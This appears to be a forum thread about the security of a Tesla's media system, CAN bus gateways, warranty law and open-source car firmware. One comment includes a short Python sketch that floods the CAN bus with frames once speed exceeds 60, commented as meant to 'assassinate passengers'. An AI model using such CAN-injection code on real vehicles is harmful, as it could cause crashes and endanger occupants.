[nekomancer]

There have actually been a ton of examples over the years of researchers hacking into car systems wirelessly, some of which used the media system as the attack vector.

Even if the media subsystem is running on dedicated hardware, the fact that it's networked with the rest of the car means that there's still a risk of it being used to gain access to other components.

[jokr004]

>Even if the media subsystem is running on dedicated hardware, the fact that it's networked with the rest of the car means that there's still a risk of it being used to gain access to other components.

I don't think anyone was claiming anything contrary to that, just that replacing the software running the media dash isn't going to fubar your car.

[nickysielicki]

I wouldn't be so sure.

I don't know enough about CAN bus to speak authoritatively about this, nor do I know the specifics of what the dashboard has access to, but given that the dash displays information like charge level and speed, I'd guess that the dash is getting that information directly from the CAN.

And I do know that CAN bus is very vulnerable. [1][2]... So you may be able to kill someone through /dev/can0, via a small program running in that chroot.

Eg: In Python

    from canard import can
    from canard.file import jsondb
    from canard.hw import socketcan

    # create and start device
    dev = socketcan.SocketCanDev("/dev/can0")
    dev.start()

    # create our DoS frame
    frame = can.Frame(id=0)
    frame.dlc = 8

    # load tesla can spec, eg: from [4]
    # CAN3, ID 0x0256
    b = parser.parse('tesla.json')

    while True:
      rec = dev.recv()
      speedo = b.parse_frame(rec)
      # assassinate passengers
      if (speedo.speed > 60):
        while True:
          dev.send(frame) 

[1]: https://www.blackhat.com/docs/asia-15/materials/asia-15-Even...

[2]: http://security.stackexchange.com/questions/88724/is-there-a...

[3]: https://github.com/ericevenchick/CANard

[4]: http://skie.net/uploads/TeslaCAN/Tesla%20Model%20S%20CAN%20D...

[regularfry]

Sensible cars have a device bridging high and low security networks, forwarding data from one to the other, specifically so that a misbehaving media device or light system can't clobber the brakes or ECU. No idea if the Tesla does this or not, but it's a fairly standard approach.

[Hemera-]

Yes, it has a gateway between the high level stuff and the low level stuff. It's fairly secure too. You can't just make calls to the can bus all willy-nilly either.

[nickysielicki]

> You can't just make calls to the can bus all willy-nilly either.

What do you mean by that? I would think that once you get UID=0 nothing can stop you from doing whatever you want to that device.

[0942v8653]

It's a completely different computer—compare it to your typical web browser/web server model. The media computer can request display the battery information (the browser can get a list of products) but it cannot hit the accelerator (the browser cannot read other users' personal information). Even if you have root on the media center (your laptop), that doesn't make it so you can run any and all commands on the computer that regulates steering and acceleration (the web server).

[snowwindwaves]

there is a gateway between the media center canbus and the critical canbus. the gateway buffers all the data from the critical canbus and rate limits any requests for data which isn't broadcast regularly on the critical canbus.

You would have to get UID=0 on the canbus gateway to make requests 'willy nilly' on the critical canbus. Having UID=0 on the media centre would only help in making willy nilly requests to the gateway.

edit: clarity

[tacticus]

though wasn't the chrysler attack through one of these gateways?

[NotSammyHagar]

The chrysler was a completely different system, but it was indeed infecting the car from the radio / entertainment system. The tesla is completely different from that. They have one entire computer system that runs the "entertainment console". You can even reboot it while you are driving and nothing happens (this is by design of course). The driving controls are totally separated. The only thing you notice when you reboot that console if that the radio goes off, the display goes black during the reboot (10 seconds). Then it comes back and all is well. Press both turning cylinder controls on the steering wheel for a few seconds to start the reboot. They designed it very well. That doesn't mean it is perfect, but they have approached security correctly as far as I can tell from outside. They pay for exploits too - see https://bugcrowd.com/tesla. They have hired security researchers to work on their system and attack it.

As a tesla owner, I do wish they would hurry up and publish their app platform. They do have apps that they wrote themselves, that come with the car.

And I really wish they'd update their web browser, and even more wish they supported linux. Maybe the chromebook os support will be secure enough for android apps that even tesla could use it.

[deegles]

But it might fubar your warranty...

"Your honor, we were not responsible for that AutoPilot crash because the driver did an unauthorized modification of the car's software!"

[jeena]

This should be handled like we handle replacing the breaks in your car if you do it yourself.

[fludlight]

How is that handled?

[arohner]

This is part of the Magnuson Moss Warranty Act: https://en.wikipedia.org/wiki/Magnuson%E2%80%93Moss_Warranty...

In effect, the manufacturer can only deny warranty claims for a specific part iff the consumer's aftermarket repair/modifications were responsible for the warrantied part failing. i.e. "I tinted the windows, and now the brakes are failing" does not result in warranty claims on the brakes being denied. However, "I replaced the brake pads [with faulty pads], and now the brake rotors are failing" can result in a denied warranty claim.

[AdamJacobMuller]

While I appreciate the sentiment there, that seems like its ripe for protracted litigation (which will never benefit the consumer).

Plus, in a connected car situation, its going to be very difficult to prove that one thing didn't cause another.

Because you rooted the media control system, your unapproved software had the ability to speak to the brake control system and apply more-than-designed force to the brakes and thereby caused this damage.

Could you be forced into proving a negative?

That said, I think most of these things happen in the context of class action suits. In a class action, its going to be hard to blame or exclude the 1% of the class that has rooted their car.

[msandford]

I don't know, but if you decide to tint your windows it doesn't somehow magically invalidate your powertrain warranty.

[radiorental]

Which is worse, proprietary closed system from car manufacturer or OSS system.

There's as many pros on one side as cons on the other.

[nisa]

False dichotomy - I think it should be similar to Kerckhoffs's principle in the long run. OSS yes, but it's signed and audited when it's able to run. Maybe like an open source version of microcode updates for CPUs. You could file a pull request because you spotted a bug but you can't fuck around your car (bad, but not so bad) and other cars (very bad).

If the Toyota code would be public we'd hear a lot of guys screaming and if you own the car and have the knowledge I guess you are keen on looking. Sure lots of noise for manufactures and likely new attack vectors but in the end public universities could look at it. On the other hand you'll end up with OpenSSL for cars.

However it should be still safe when public that what should be the design goal. However what you read about embedded stuff in cars and airplanes...OSS would be likely an improvement. I for one would like to file a pull request against the A380 firmware :)

[radiorental]

Does the fact that most of the code in your car is autogenerated from tools like Modelica change your view on how likely this can/should be opened?

That is, the 'model' is the truth and the IP. The generated code is spaghetti, the vendors components are black boxes, and their 'code' is nothing more than another locked subsystem in the model.

Let's say in an ideal world, these mission critical systems must be opened - what do you propose everyone's business model should be? If everyone must see each others models... where is the free market competitive advantage to be gained?